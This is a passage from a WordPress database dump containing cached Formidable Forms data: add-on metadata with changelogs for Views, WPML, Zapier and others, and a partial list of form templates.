saving<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-user-tracking\\/formidable-user-tracking.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28027505\":{\"title\":\"Views\",\"name\":\"Views\",\"display_name\":\"Legacy Views\",\"slug\":\"views\",\"version\":\"4.0.05\",\"new_version\":\"4.0.05\",\"location\":[\"fp.strategy11.com\\/releases\\/views\\/formidable-views-4.0.05.zip\"],\"excerpt\":\"Add the power of views to your Formidable Forms to display your form submissions in listings, tables, calendars, and more.\",\"id\":28027505,\"released\":\"2010-10-28 00:00:00\",\"categories\":[\"Strategy11\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase-category\\/views\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/views\\/\",\"changelog\":\"<h4>v5.4 - March 13, 2023<\\/h4>\\n<ul>\\n<li>New: Added <span class=\\\"blob-code-inner blob-code-marker js-code-nav-pass \\\" data-code-marker=\\\"+\\\"><span class=\\\"pl-s\\\">frm_views_table_class<\\/span><\\/span> and <span class=\\\"blob-code-inner blob-code-marker js-code-nav-pass \\\" data-code-marker=\\\"+\\\"><span class=\\\"pl-s\\\">frm_display_inner_content_before_add_wrapper<\\/span><\\/span> filters.<\\/li>\\n<li>Fix: Prevent a PHP 8.2 deprecation message when handling hidden column screen option preferences for the table on the view list page.<\\/li>\\n<li>Fix: Detail page content would incorrectly be detected as not empty in grid views, causing issues with nested views displaying a \\\"No entries found\\\" message unexpectedly. This fix may require that a nested detail page with no content gets saved again in order to resolve.<\\/li>\\n<li>Updated styling so the visual view editor looks nicer with the v6.0 core update.<\\/li>\\n<li>Removed a deprecated jQuery function reference used when dismissing modals.<\\/li>\\n<\\/ul>\\n<h4>v5.2.1 - June 2, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new Application column to the views list page.<\\/li>\\n<li>New: Improved support for the new Add\\/Edit Applications and Access Application Dashboard permission settings added in Pro.<\\/li>\\n<\\/ul>\\n<h4>v5.2 - May 24, 2022<\\/h4>\\n<ul>\\n<li>New: Added support for using views with Applications.<\\/li>\\n<li>Fix: Updated Elementor widget so it no longer uses the deprecated _register_controls method.<\\/li>\\n<li>Fix: Fixed issues with deprecated messages in PHP 8.1.<\\/li>\\n<\\/ul>\\n<h4>v4.0.05 - June 16, 2021<\\/h4>\\n<ul>\\n<li>New: Optimized how meta for views is retrieved to improve support for sites with thousands of views.<\\/li>\\n<li>Fix: Updated the view excerpt filter to prevent a conflict with some other third party plugins.<\\/li>\\n<\\/ul>\\n<h4>v4.0.04 - May 27, 2021<\\/h4>\\n<ul>\\n<li>New: Added backward compatibility for the new visual grid views (in beta).<\\/li>\\n<li>Fix: Entries created at the same time were appearing on multiple pages due to a sorting issue.<\\/li>\\n<li>Fix: The shortcode options popup for setting custom content in a post action would not close in Chrome.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-views\\/formidable-views.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"28058856\":{\"title\":\"Visual Views\",\"name\":\"Visual Views\",\"display_name\":\"Visual Views\",\"slug\":\"visual-views\",\"version\":\"5.4.1\",\"new_version\":\"5.4.1\",\"location\":[\"fp.strategy11.com\\/releases\\/views\\/formidable-views-5.4.1.zip\"],\"excerpt\":\"Create WordPress web apps to display your form submissions in grids, tables, calendars, and more.\",\"id\":28058856,\"released\":\"2021-05-31 00:00:00\",\"categories\":[\"Creator\",\"Strategy11\"],\"docs\":\"https:\\/\\/formidableforms.com\\/knowledgebase-category\\/views\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/visual-views\\/\",\"changelog\":\"<h4>v5.4.1 - April 27, 2023<\\/h4>\\n<ul>\\n<li>Fix: New views set to copy to other sites would not copy because of a missing hook.<\\/li>\\n<li>Fix: The border width setting was broken when styling individual grid view cells.<\\/li>\\n<li>Fix: Grid view borders width settings would be ignored when using 0 as the value.<\\/li>\\n<li>Fix: Prevent a PHP Notice when loading dropdown options when there are no views in the database.<\\/li>\\n<\\/ul>\\n<h4>v5.3.3 - October 27, 2022<\\/h4>\\n<ul>\\n<li>New: The form title at the top of the view editor now shows the view title in a dropdown instead. This can be used to jump to other views more quickly without leaving the editor.<\\/li>\\n<li>New: Canonical URLs will now be filtered for views to make sharing easier for detail pages and pages with get param filters. Some sharing tools, including Facebook and the Safari share option on iOS, would always share the URL of the listing page instead without filters.<\\/li>\\n<li>New: Added a few default grid style rules as a fallback for cases where CSS variables are not supported.<\\/li>\\n<li>Fix: All entries would appear when filtering with a [get param] shortcode and using an \\\"OR\\\" when a get param was set but didn\'t match.<\\/li>\\n<li>Fix: Changed the check for the view editor for better compatibility. In some cases the class name was not getting added resulting in a few issues including a case where clicking a shortcode option wouldn\'t insert into the rich text editor when editing view content.<\\/li>\\n<li>Fix: Detail links would switch to using the view\'s URL instead of the URL of the page the view is nested in when AJAX pagination was on after changing the page for the first time.<\\/li>\\n<li>Fix: Added extra style rules for the view editor to avoid conflicting CSS causing the header to appear smaller than full width on the page.<\\/li>\\n<li>New views will no longer be named automatically when the form dropdown is shown to avoid names being replaced by a default when the form changes.<\\/li>\\n<li>The close button in the view editor will now link to the view list instead of the form list.<\\/li>\\n<\\/ul>\\n<h4>v5.3.2 - September 26, 2022<\\/h4>\\n<ul>\\n<li>New: [form_name] shortcodes now work in Views.<\\/li>\\n<li>Fix: All entries would appear when using \\\"OR\\\" filters when filtering by a [get] shortcode that does not exist.<\\/li>\\n<li>Fix: No entries would appear when using \\\"OR\\\" filter when filtering by current_user if the user was not logged in.<\\/li>\\n<li>Fix: Remove an extra unexpected border around Grid views that happened when a border thickness was set because of a conflict with WordPress.<\\/li>\\n<li>Fix: AJAX Pagination will now work if the view content is wrapped in a &lt;div&gt; element set in before and after content.<\\/li>\\n<li>Fix: Modals created using the Formidable Bootstrap Modal add on were not working as expected with AJAX Pagination.<\\/li>\\n<li>Fix: The third step to set up table view columns was being skipped when creating a new Table View.<\\/li>\\n<\\/ul>\\n<h4>v5.3.1 - August 29, 2022<\\/h4>\\n<ul>\\n<li>New: Improved the accessibility of the new view pop up. Hitting the enter key when entering a view name will now submit the form instead of requiring a button click. Tab indexing has been improved, important inputs will automatically gain focus, and pauses have been added between titles and descriptions.<\\/li>\\n<li>New: Updated deprecated code in the Views Elementor widget for better compatibility with new versions of Elementor.<\\/li>\\n<li>Fix: Grid and table view styles were not automatically included in Formidable CSS without saving the style manager first.<\\/li>\\n<li>Fix: Images in the visual view preview were stretching. The image\'s ratio will now be maintained in the preview.<\\/li>\\n<\\/ul>\\n<h4>v5.3 - June 22, 2022<\\/h4>\\n<ul>\\n<li>New: Added a new AJAX Pagination setting to views, allowing for pagination without reloading the entire page and the new Infinite Scroll option.<\\/li>\\n<li>Fix: Entries would not appear when sorted by post title when no post was associated with the entry.<\\/li>\\n<li>Fix: Some items were not being displayed and other items were appearing twice when the page_size value was not divisible by the limit value.<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-views\\/formidable-views.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"174006\":{\"title\":\"WooCommerce\",\"name\":\"WooCommerce\",\"display_name\":\"WooCommerce\",\"slug\":\"woocommerce\",\"version\":\"1.11\",\"new_version\":\"1.11\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-woocommerce\\/formidable-woocommerce-1.11.zip\"],\"excerpt\":\"Are your WooCommerce product forms too basic? Add custom fields to a product form and collect more data when it is added to the cart.\",\"id\":174006,\"released\":\"2016-01-19 00:00:00\",\"categories\":[\"Ecommerce\",\"Elite\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-woocommerce\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/woocommerce\\/\",\"changelog\":\"\",\"plugin\":\"formidable-woocommerce\\/formidable-woocommerce.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"169998\":{\"title\":\"WP Multilingual\",\"name\":\"WP Multilingual\",\"display_name\":\"WP Multilingual\",\"slug\":\"wp-multilingual\",\"version\":\"1.12\",\"new_version\":\"1.12\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-wpml\\/formidable-wpml-1.12.zip\"],\"excerpt\":\"Translate your forms into multiple languages using the Formidable-integrated WPML plugin.\",\"id\":169998,\"released\":\"2013-04-29 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-multi-language\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/wp-multilingual\\/\",\"changelog\":\"<h4>v1.12 - August 8, 2022<\\/h4>\\n<ul>\\n<li>New: Translations are now copied when a field or form is duplicated.<\\/li>\\n<li>New: Confirmation field validation messages can now be translated.<\\/li>\\n<li>Fix: Placeholders for Lookup dropdowns were not translating.<\\/li>\\n<li>Fix: Updated translations were not properly updating.<\\/li>\\n<\\/ul>\\n<h4>v1.11 - March 25, 2022<\\/h4>\\n<ul>\\n<li>Fix: Likert column headings were not translating properly.<\\/li>\\n<li>Fix: Incorrect and occasionally duplicate field translation options were appearing on translation pages.<\\/li>\\n<li>Fix: Formidable was appearing as an option in the WPML item dropdown, and has been removed.<\\/li>\\n<\\/ul>\\n<h4>v1.10 - July 29, 2021<\\/h4>\\n<ul>\\n<li>New: Placeholders can now be translated for credit card, address, and name fields.<\\/li>\\n<li>New: Options can now be translated for radio, checkbox, and dropdown fields inside of repeaters.<\\/li>\\n<li>Fix: Translations were not properly getting saved if the target language contained an underscore.<\\/li>\\n<\\/ul>\\n<h4>v1.09 - February 25, 2021<\\/h4>\\n<ul>\\n<li>New: Products are now translatable.<\\/li>\\n<li>New: Translations are now sorted by field order in settings.<\\/li>\\n<li>Fix: PHP8 was frequently logging a deprecation warning.<\\/li>\\n<\\/ul>\\n<h4>v1.06 - April 4, 2019<\\/h4>\\n<ul>\\n<li>Switch back to using separate values by default for checkboxes, radio, and dropdown fields<\\/li>\\n<\\/ul>\\n<h4>v1.04 - October 25th, 2016<\\/h4>\\n<ul>\\n<li>Allow translation of Add\\/Remove buttons<\\/li>\\n<li>Replace some deprecated WPML function calls and constants<\\/li>\\n<li>Make sure wpml strings are updated when form is updated<\\/li>\\n<li>Do not translate default value for all field types<\\/li>\\n<li>Make sure incorrect field message is translated with ajax submit<\\/li>\\n<\\/ul>\\n<h4>v1.03.03 - March 28, 2016<\\/h4>\\n<ul>\\n<li>Send the language in the ajax url differently to prevent 404s during ajax calls. This should help with duplicate submissions.<\\/li>\\n<li>Prevent a license key from being saved for another plugin<\\/li>\\n<\\/ul>\\n<h4>v1.03.02<\\/h4>\\n<ul>\\n<li>Get updates from FormidablePro.com<\\/li>\\n<li>Make it compatible with the free version of Formidable<\\/li>\\n<li>Fix errors when Formidable or WPML are deactivated<\\/li>\\n<li>Include the current language during ajax calls<\\/li>\\n<li>Force an English start language for strings for v2.2.6 of the WPML strings plugin<\\/li>\\n<li>Fix the issue with the default language in WPML being set different than the string language<\\/li>\\n<li>If values in the form settings page changed, update them when going to the translation settings<\\/li>\\n<li>Make sure the \\\"previous\\\" label is translatable when drafts are not enabled<\\/li>\\n<li>Don\'t show strings for inactive languages<\\/li>\\n<li>Translate fields in repeating sections<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-wpml\\/formidable-wpml.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false},\"170645\":{\"title\":\"Zapier\",\"name\":\"Zapier\",\"display_name\":\"Zapier\",\"slug\":\"zapier\",\"version\":\"2.02\",\"new_version\":\"2.02\",\"location\":[\"fp.strategy11.com\\/releases\\/formidable-zapier\\/formidable-zapier-2.02.zip\"],\"excerpt\":\"Connect with hundreds of applications through Zapier. Automatically insert a Google spreadsheet row, tweet, or upload to Dropbox.\",\"id\":170645,\"released\":\"2014-06-04 00:00:00\",\"categories\":[\"Business\",\"Strategy11\"],\"docs\":\"\\/knowledgebase\\/formidable-zapier\\/\",\"link\":\"https:\\/\\/formidableforms.com\\/downloads\\/zapier\\/\",\"changelog\":\"<h4>v2.02 - March 21, 2023<\\/h4>\\n<ul>\\n<li>New: Referrer checks for protected files are now allowed for Zapier requests so a protected file can be uploaded to Google Drive using a Zapier action. Protected files also need to be available to everyone or Zapier still will not have access.<\\/li>\\n<li>New: Added translation support.<\\/li>\\n<li>Fix: The \\/form API endpoint was calling a deprecated function.<\\/li>\\n<li>Fix: Prevent a fatal error when Formidable lite is inactive.<\\/li>\\n<li>Fix: The link to edit a zap would lead to a 404 page.<\\/li>\\n<li>Additional validation has been added to prevent notices for an incomplete API URL.<\\/li>\\n<li>The message to migrate will no longer be shown when no legacy Zapier posts exist.<\\/li>\\n<li>A warning will now be displayed on any temporary Zapier actions that get created for testing before publishing a zap.<\\/li>\\n<\\/ul>\\n<h4>v2.0 - September 14, 2020<\\/h4>\\n<ul>\\n<li>This update requires action. After updating, click the link to migrate the old settings. <strong>Zaps will not be triggered after updating until this is completed.<\\/strong><\\/li>\\n<li>New: Move Zapier settings to form actions. This allows for conditional logic and form action automation to be used from the Formidable end.<\\/li>\\n<li>New: Better logging for more info for both incoming and outgoing API calls for easier debugging.<\\/li>\\n<\\/ul>\\n<h4>v2.01 - September 14, 2020<\\/h4>\\n<p>Fix: Javascript error showing when migration was started<\\/p>\\n<h4>v1.06 - February 6, 2019<\\/h4>\\n<ul>\\n<li>Add a new fallback for authentication with the API key in the url. When the API key continues to say it is missing, add add_filter( \'frm_zap_url_auth\', \'__return_true\' ); in the theme functions.php.<br \\/>\\nThen use this url in Zapier:<br \\/>\\nhttps:\\/\\/yoursite.com\\/API-KEY-GOES-HERE\\/\\n<\\/li>\\n<li>New: Add frm_zap_sent hook to run after an entry is sent to Zapier<\\/li>\\n<li>Fix: Don\'t send draft entries to Zapier<\\/li>\\n<li>Added automation to release new versions<\\/li>\\n<\\/ul>\\n<h4>v1.05 - July 31, 2018<\\/h4>\\n<ul>\\n<li>New: Add frmzap_entry_array filter to customize the entry values sent to Zapier<\\/li>\\n<li>New: Add logging of Zapier responses into the Logs addon<\\/li>\\n<li>Fix: Prevent a blank response when fetching the list of forms. This was happening on some sites with a lot of forms<\\/li>\\n<\\/ul>\\n\",\"plugin\":\"formidable-zapier\\/formidable-zapier.php\",\"icons\":{\"1x\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/icon-256x256.png\"},\"banners\":{\"high\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\",\"low\":\"https:\\/\\/ps.w.org\\/formidable\\/assets\\/banner-1544x500.png\"},\"search_terms\":\"\",\"is_new\":false}}\";s:7:\"version\";s:5:\"6.4.1\";}','no'),
(359458,'frm_form_templates_l','a:3:{s:7:\"timeout\";i:1692763107;s:5:\"value\";s:101651:\"{\"20874729\":{\"name\":\"Advanced Mortgage Calculator Template\",\"slug\":\"advanced-mortgage-calculator-form\",\"description\":\"Get an advanced, in-depth financial analysis on a new mortgage.\",\"id\":20874729,\"released\":\"2019-01-01 12:11:07\",\"categories\":[\"Business\",\"Calculator\",\"Finance\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/advanced-mortgage-calculator-form\\/\",\"icon\":false,\"key\":\"advanced-mortgage-calculator\",\"is_new\":false},\"20872734\":{\"name\":\"Contact Us Form Template\",\"slug\":\"contact-us-form\",\"description\":\"A basic contact form that for any WordPress website.\",\"id\":20872734,\"released\":\"2017-01-17 16:31:35\",\"categories\":[\"Contact\",\"free\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/contact-us-form\\/\",\"icon\":false,\"key\":\"contact-us\",\"is_new\":false},\"20874753\":{\"name\":\"Edit User Profile Form Template\",\"slug\":\"edit-user-profile-form\",\"description\":\"The basics from the regular WordPress profile page including first and last name, password and email, avatar, website, and bio.\",\"id\":20874753,\"released\":\"2019-01-01 13:25:02\",\"categories\":[\"Business\",\"User Registration\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/edit-user-profile-form\\/\",\"icon\":false,\"key\":\"edit-user-profile\",\"is_new\":false},\"20907786\":{\"name\":\"BMI Calculator Form Template\",\"slug\":\"bmi-calculator-form\",\"description\":\"Calculate BMI (body mass index) to help clients improve health & fitness.\",\"id\":20907786,\"released\":\"2019-11-24 23:00:06\",\"categories\":[\"Business\",\"Calculator\",\"Health and Wellness\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/bmi-calculator-form\\/\",\"icon\":false,\"key\":\"bmi-calculator\",\"is_new\":false},\"20874748\":{\"name\":\"User Registration Form Template\",\"slug\":\"user-registration-form\",\"description\":\"Let users register on the front-end of your site and set their username, email, password, name, and avatar. \",\"id\":20874748,\"released\":\"2019-01-01 13:14:35\",\"categories\":[\"Business\",\"User Registration\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/user-registration-form\\/\",\"icon\":false,\"key\":\"user-registration\",\"is_new\":false},\"20882522\":{\"name\":\"Create WordPress Post Form Template\",\"slug\":\"create-wordpress-post-form\",\"description\":\"Allow users to create WordPress posts from the front-end of your site with the Create WordPress Post form template.\",\"id\":20882522,\"released\":\"2019-03-26 15:05:14\",\"categories\":[\"Basic\",\"Post\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/create-wordpress-post-form\\/\",\"icon\":false,\"key\":\"create-wordpress-post\",\"is_new\":false},\"20908667\":{\"name\":\"Percentage Calculator Template\",\"slug\":\"percentage-calculator-form\",\"description\":\"Find a specified percentage of an entered number.\",\"id\":20908667,\"released\":\"2019-11-24 23:00:25\",\"categories\":[\"Calculator\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/percentage-calculator-form\\/\",\"icon\":false,\"key\":\"percentage-calculator\",\"is_new\":false},\"20874739\":{\"name\":\"Credit Card Payment Template\",\"slug\":\"credit-card-payment-form\",\"description\":\"Use with either the Stripe or Authorize.net add-ons to securely run payments while keeping users on your site.\",\"id\":20874739,\"released\":\"2019-01-01 12:29:14\",\"categories\":[\"Business\",\"Payment\",\"Stripe\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/credit-card-payment-form\\/\",\"icon\":false,\"key\":\"credit-card-payment\",\"is_new\":false},\"20874752\":{\"name\":\"Simple Mortgage Calculator Template\",\"slug\":\"simple-mortgage-calculator-form\",\"description\":\"Optimize any real estate website with this responsive mortgage calculator!\",\"id\":20874752,\"released\":\"2019-01-01 12:55:25\",\"categories\":[\"Business\",\"Calculator\",\"Finance\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/simple-mortgage-calculator-form\\/\",\"icon\":false,\"key\":\"simple-mortgage-calculator\",\"is_new\":false},\"20874778\":{\"name\":\"WooCommerce Product Configurator\",\"slug\":\"sample-woocommerce-product-configurator-form\",\"description\":\"Calculate the total value of a WooCommerce product with add-ons and style options.\",\"id\":20874778,\"released\":\"2019-01-29 14:29:25\",\"categories\":[\"Calculator\",\"Elite\",\"WooCommerce\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/sample-woocommerce-product-configurator-form\\/\",\"icon\":false,\"key\":\"sample-woocommerce-product-configurator\",\"is_new\":false},\"20874747\":{\"name\":\"Create WooCommerce Product Template\",\"slug\":\"create-woocommerce-product-form\",\"description\":\"Easily create WooCommerce products with front-end creation, auto-populated fields, manual or automatic approval.\",\"id\":20874747,\"released\":\"2019-01-29 13:20:10\",\"categories\":[\"Elite\",\"WooCommerce\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/create-woocommerce-product-form\\/\",\"icon\":false,\"key\":\"create-woocommerce-product\",\"is_new\":false},\"20874749\":{\"name\":\"Travel Booking Form Template\",\"slug\":\"travel-booking-form\",\"description\":\"Setting up a travel website? Plan-ahead ride service? Allow your users to easily reserve travel services.\",\"id\":20874749,\"released\":\"2019-01-01 12:53:00\",\"categories\":[\"Business\",\"Event Planning\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/travel-booking-form\\/\",\"icon\":false,\"key\":\"travel-booking\",\"is_new\":false},\"20873706\":{\"name\":\"User Information Form Template\",\"slug\":\"user-information-form\",\"description\":\"Get a WordPress contact form with more user information including website and address.\",\"id\":20873706,\"released\":\"2017-01-23 19:08:49\",\"categories\":[\"Basic\",\"Contact\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/user-information-form\\/\",\"icon\":false,\"key\":\"user-information\",\"is_new\":false},\"20874743\":{\"name\":\"Simple User Registration Form Template\",\"slug\":\"simple-user-registration-form\",\"description\":\"The perfect minimalistic approach to user registration. Make the registration process as simple as possible.\",\"id\":20874743,\"released\":\"2019-01-01 13:24:20\",\"categories\":[\"Business\",\"User Registration\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/simple-user-registration-form\\/\",\"icon\":false,\"key\":\"simple-user-registration\",\"is_new\":false},\"20874759\":{\"name\":\"Extended Contact Details Template\",\"slug\":\"extended-contact-details-form\",\"description\":\"Looking for a contact form template that packs a little more punch? This contact form template is complete with social media contact info.\",\"id\":20874759,\"released\":\"2019-01-01 13:15:45\",\"categories\":[\"Basic\",\"Contact\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/extended-contact-details-form\\/\",\"icon\":false,\"key\":\"extended-contact-details\",\"is_new\":false},\"20882523\":{\"name\":\"Net Promoter Score (NPS) Survey Form Template\",\"slug\":\"nps-survey-form\",\"description\":\"Collect valuable feedback to increase customer satisfaction.\",\"id\":20882523,\"released\":\"2019-03-26 15:01:03\",\"categories\":[\"Business\",\"Calculator\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/nps-survey-form\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2019\\/03\\/net-promoter-score-nps-survey.jpg\",650,288,false],\"key\":\"nps-survey\",\"is_new\":false},\"20874754\":{\"name\":\"Customer Feedback Form Template\",\"slug\":\"customer-feedback-form\",\"description\":\"Get suggestions and valuable feedback from your customers.\",\"id\":20874754,\"released\":\"2019-01-29 13:23:40\",\"categories\":[\"Business\",\"Feedback\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/customer-feedback-form\\/\",\"icon\":false,\"key\":\"customer-feedback\",\"is_new\":false},\"20908979\":{\"name\":\"Testimonial Form Template\",\"slug\":\"testimonial-form\",\"description\":\"Collect and share customer testimonials.\",\"id\":20908979,\"released\":\"2020-01-06 09:52:47\",\"categories\":[\"Marketing\",\"Personal\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/testimonial-form\\/\",\"icon\":[\"https:\\/\\/formidableforms.com\\/wp-content\\/uploads\\/2020\\/01\\/testimonial-form-template.jpg\",650,288,false],\"key\":\"testimonial\",\"is_new\":false},\"20874733\":{\"name\":\"Car Payment Calculator Template\",\"slug\":\"automobile-payment-calculator-form\",\"description\":\"Calculate monthly payments with an easy auto loan calculator.\",\"id\":20874733,\"released\":\"2019-01-01 13:22:05\",\"categories\":[\"Business\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/automobile-payment-calculator-form\\/\",\"icon\":false,\"key\":\"automobile-payment-calculator\",\"is_new\":false},\"20874742\":{\"name\":\"PayPal Donation Form Template\",\"slug\":\"paypal-donation-form\",\"description\":\"Easily and securely collect PayPal donations from anyone.\",\"id\":20874742,\"released\":\"2019-01-01 13:13:24\",\"categories\":[\"Business\",\"Nonprofit\",\"Payment\",\"PayPal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/paypal-donation-form\\/\",\"icon\":false,\"key\":\"paypal-donation\",\"is_new\":false},\"28019201\":{\"name\":\"Charitable Donation Form Template\",\"slug\":\"charitable-donation-form\",\"description\":\"A quick and easy form for keeping track of charitable donations.\",\"id\":28019201,\"released\":\"2020-09-11 14:40:07\",\"categories\":[\"Business\",\"Nonprofit\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/charitable-donation-form\\/\",\"icon\":false,\"key\":\"charitable-donation\",\"is_new\":false},\"20873677\":{\"name\":\"Real Estate Listings Form Template\",\"slug\":\"real-estate-listings-form\",\"description\":\"Show Real Estate listings on your site. First add listings in a form, then create a view to display them.\",\"id\":20873677,\"released\":\"2017-01-23 18:56:44\",\"categories\":[\"Personal\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/real-estate-listings-form\\/\",\"icon\":false,\"key\":\"real-estate-listings\",\"is_new\":false},\"20874746\":{\"name\":\"Mortgage Application Form Template\",\"slug\":\"mortgage-application-form\",\"description\":\"A complete and professional mortgage application form template to allow individuals to easily apply for mortgages on your site.\",\"id\":20874746,\"released\":\"2019-01-01 12:46:47\",\"categories\":[\"Application\",\"Business\",\"Real Estate\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/mortgage-application-form\\/\",\"icon\":false,\"key\":\"mortgage-application\",\"is_new\":false},\"20874045\":{\"name\":\"Job Application Form Template\",\"slug\":\"job-application-form\",\"description\":\"Streamline your hiring process by collecting employment applications online and get more applications.\",\"id\":20874045,\"released\":\"2017-01-25 15:33:33\",\"categories\":[\"Application\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/job-application-form\\/\",\"icon\":false,\"key\":\"job-application\",\"is_new\":false},\"20874751\":{\"name\":\"Volunteer Recruitment Application Form\",\"slug\":\"volunteer-recruitment-application-form\",\"description\":\"Collect scheduling details, contact information, and relevant experience from volunteer applicants.\\r\\n\",\"id\":20874751,\"released\":\"2019-01-01 13:21:01\",\"categories\":[\"Application\",\"Business\",\"Nonprofit\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/volunteer-recruitment-application-form\\/\",\"icon\":false,\"key\":\"volunteer-recruitment-application\",\"is_new\":false},\"20874757\":{\"name\":\"Small Business Loan Application Form\",\"slug\":\"small-business-loan-application-form\",\"description\":\"A complete loan application for small businesses and startups. Allow business owners to easily apply for loans on your site.\",\"id\":20874757,\"released\":\"2019-01-01 13:17:02\",\"categories\":[\"Application\",\"Business\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/small-business-loan-application-form\\/\",\"icon\":false,\"key\":\"small-business-loan-application\",\"is_new\":false},\"20874049\":{\"name\":\"Emergency Contact Form Template\",\"slug\":\"emergency-contact-form\",\"description\":\"Protect your clients and be prepared for any situation by collecting emergency contact and basic medical information.\",\"id\":20874049,\"released\":\"2019-01-01 15:50:21\",\"categories\":[\"Business\",\"Contact\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/emergency-contact-form\\/\",\"icon\":false,\"key\":\"emergency-contact\",\"is_new\":false},\"28080527\":{\"name\":\"Sample Size Calculator Template\",\"slug\":\"sample-size-calculator-form\",\"description\":\"Find out how many people need to respond to a survey to produce statistically significant results.\",\"id\":28080527,\"released\":\"2021-09-20 12:49:06\",\"categories\":[\"Business\",\"Business Operations\",\"Calculator\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/sample-size-calculator-form\\/\",\"icon\":false,\"key\":\"sample-size-calculator\",\"is_new\":false},\"20908981\":{\"name\":\"Survey Form Template\",\"slug\":\"survey-form\",\"description\":\"Collect feedback from your customers, employees, or other members of your community using an online survey form.\",\"id\":20908981,\"released\":\"2021-09-16 23:33:58\",\"categories\":[\"Business\",\"Survey\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/survey-form\\/\",\"icon\":false,\"key\":\"survey\",\"is_new\":false},\"20908986\":{\"name\":\"Newsletter Signup Form Template\",\"slug\":\"newsletter-signup-form\",\"description\":\"Build your email list and ramp up your email marketing efforts with a newsletter signup form.\",\"id\":20908986,\"released\":\"2019-11-24 23:00:52\",\"categories\":[\"Marketing\",\"Personal\"],\"link\":\"https:\\/\\/formidableforms.com\\/form-templates\\/newsletter-signup-form\\/\",\"icon\":false,\"key\":\"newsletter-signup\",\"is_new\":false},\"20873681\":{\"name\":\"SMS Get Quote Form Template\",\"slug\":\"sms-get-quote-form\",\"description\":\"The most streamlined quote form. When the form is submitted, get an instant SMS notification to let you know of a quote request.\",\"id\":20873681,\"released\":\"2019-01-01 19:15:29\",\"categories\":[\"Business\",\"Business 